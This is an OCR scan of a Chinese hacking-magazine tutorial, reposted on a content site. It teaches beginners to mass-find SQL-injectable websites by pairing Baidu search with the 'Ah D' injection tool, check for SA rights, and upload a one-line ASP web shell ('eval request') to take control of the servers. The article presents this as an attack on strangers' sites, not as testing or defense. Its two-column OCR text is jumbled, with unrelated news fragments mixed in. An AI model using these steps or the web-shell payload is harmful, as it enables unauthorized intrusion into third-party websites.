admin管理员组文章数量:1531410
2024年5月10日发(作者:)
维普资讯
●菜鸟如何利用“啊D注入工具”轻松抓肉鸡的方法
抓肉鸡还得老将出马 一文/图张黎
许多朋友老是问怎么才能入侵一个网站,也有的朋友问有没有上传木马的空间,或者问怎么拿到一只肉鸡
玩。其实抓肉鸡是一个很简单的事情,这里我们就再现经典的SQL注入漏洞,包每—个读者都能拿到网站肉鸡。
搜漏的技巧——寻找有漏洞的主机
链接地址(如图2)。对SQL注入略有所知的用户,肯
定都会忍不住打开一个链接,然后开始测试链接是否存
首先准备的是一个SQL注入工具“啊D注入工具
在SQL注入漏洞了DE?
v2.3”,这可是一个经典的SQL注入工具了,不知道什
一
个秘不外传的技巧
么是SQL注入的朋友,可以上网查一下资料。既然拿出
一
般的黑客书籍上面,都是教菜鸟们一个一个地检
“啊D注入工具v2.3”。那么肯定是要进行SQL注入攻
测链接地址,不管是手工检测也好,还是用工具检测也
击了。但问题是如何寻找有SQL注入漏洞的主机呢?一
好,都是非常麻烦的。也许试到头昏眼花,也不一定找
个非常简单的技巧那就是百度与啊D结合,迅速寻找到
得到SQL注入漏洞链接地址,其实有更高效的方法可以
上万台有SQL注入漏洞的网站主机。
让寻找SQL注入漏洞自动化许多。
百度找链接
直接在浏览器地址栏中,复制搜索结果网页
打开百度搜索,在页面中点击“高级”链接,打开
的链接地址,这里为“httP://wWW.baidu.com/
百度的高级搜索页面。在“包含以下全部的关键词”中
s?tn=bajduadv&q1=asp%3F&q2=&q3=&q4=&rn=
输入“.asp?”,将“搜索结果显示条数”设置为“每
1 OO&l rn=O&ct=O&ft=&q5=2&q6=”。复制后,运行
页显示1O0条”, “语言”设置为“全部语言”(如
“啊D注入工具v2.3”,点击左侧边栏中的“注入检
图1)。将“关键词位置”设置为“仅在网页的URL
测”一“扫描注入点”,在右边窗口的地址栏中,粘贴
刚才复制的搜索链接。然后点击地址栏后的“打开网
页”按钮,在窗口中就会显示刚才的搜索结果页面了
(如图3)。
此时,表面看起来与在浏览器中进行搜索没有什么
两样,但实际上啊D注入工具已经开始自动分析搜索结
果中的每一个链接地址,并检测是否存在SQL注入漏洞
中”。最后点击“百度一下”按钮,即可打开搜索结果
了。在下方的检测框中会显示“正在检测xx个链接”,
面面了。可以看到页面中显示的搜索结果,都是形如
多等一会儿,让所有链接检测完毕,然后就可以看到检
“http://www.….com/*.asp? =”’之类的字符或数字型
测框中列表显示存在SQL注入漏洞的链接地址了。如果
在当前页中没有检测到多少漏洞链接,那么可在上方的
窗口页面中,点击搜索结果下一页链接,继续检测漏洞
链接。最多一分钟,你就可以看到列表中显示数十个漏
洞链接地址了(如图4)。
由于SQL注入攻击曾经很泛滥,因此许多网站都打
上了SQL注入漏洞的补丁,现在要找存在SQL注入漏洞
的站点是非常难了。不过巧妙的将百度搜索功能与啊D
注人工具的页面链接分析检测功能相结合,就可以很轻
据国外媒体报道・削 漏洞。建议大家尽快升级自爨嚣蠹 嚣薹己的播放器. 器以免成为黑客们的 慧 喜篙 嘉 猎物”。 譬 Net&Tends 51
维普资讯
查看界面的“检测位置”
中,输入要查看文件的目
录路径,点击“开始检
测”按钮,即可显示该目
录下的文件及子文件夹
了。一般来说,网站的路
径都是位于非系统盘的,
大部分是位于“D:\WEB”
中,可以直接查看该路径
中的文件信息(如图6)。
如果该文件夹不存在,则
松的找到成千上万个SQL注入漏洞链接地址了。上面的
只有从C盘D盘等根目录慢
搜索结果就有4800多万条,这其中就算只有1%的漏洞
慢查找网站的路径了。
概率,也有数十万个漏洞链接地址!菜乌们再也不用担
上传木马
心出现漏洞过时,找不到漏洞站点攻击练手的现象了。
用记事本编写一个后缀名asp的文件,内容如下:
<%eval request(“pass“1%>
注意,在写入文件时,上面代码中的“pass”就是
后面要用到的连接密码,需要改为自己想要的密码。将
文件保存为“muma asp”,然后在啊D注入工具中,点
击左侧“相关工具”一“CMD/上传”项,在命令执行
与上传界面下方的“上传文件”中,点击下方的“本地
文件”浏览按钮,浏览指定刚才保存的“muma.asp”
轻松拿下漏洞站点
文件。在“目标路径”中设定文件保存路径,注意要
指定保存在网站路径之下,这里为“D:\WEB\muma
找到了存在SQL注入漏洞的站点后,如何进行攻击
asp”。最后点击“上传”按钮,就可以成功的将木马
呢?SQL ̄¥入攻击的方式多种多样,l;kAz:l]猜解管理员密
上传到网站根目录下了(如图7)。上传完成后。再用
码和后台登录页面,直接利用xp—cmdshell开3389或上传
“目录查看”功能,查看一下文件是否上传成功。
木马等。这里我们选择的当然是最简单的方法,什么权
限、后台密码破解之类的都不用——利用SA上传木马!
检测SA权限
在检测到的漏洞链接地址列表中,右键点击某个漏
洞链接,在弹出菜单中选择“注入检测”命令,切换到
“SQL注入检测”界面。点击右边界面中的“检测”按
钮,将自动检测该链接是否存在SQL注入漏洞,如果存
在的话,则显示当前数据库类型、用户和权限等信息。
详细看看下方显示的结果,如果看到“SA”和“多句执
连接木马
行”(如图5),那么恭喜小菜们,你基本上可以肯定
运行桂林老兵的木马后门管理工具
的拿下这个网站,获得一个肉鸡了!
“webshe_IConfro『v2 0”,点击菜单“工具”一“shel l
管理”命令,打开Shell管理窗口。在下方的“地址”
中输入刚才上传的ASP木马链接地址及连接密码,点击
“连接”按钮,即可连接打开WebshelI。在Webshel {
管理窗口中,可以查
看任意目录中的文
件,并可以上传、下
载或编辑任意文件
(如图8)。
现在这台网站服
务器基本处于我们的
控制之下了,要上传
木马,或者将网站作
为自己的免费空间都是很容易的了。至于进一步提升权
列目录,找网站路径 限,安装远程控制木马则需要一定的入侵知识,留待小
点击左侧“相关工具” +“目录查看”,在目录 菜们以后慢慢提高学习吧!ee
52 Net fnends 蓑誓 釜季喜嘉纂爹霎 喜 _种攻击方法 经演变为大规模网络攻击' 前 有超过加。万个
版权声明:本文标题:抓肉鸡还得老将出马 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dongtai/1715325850a446479.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论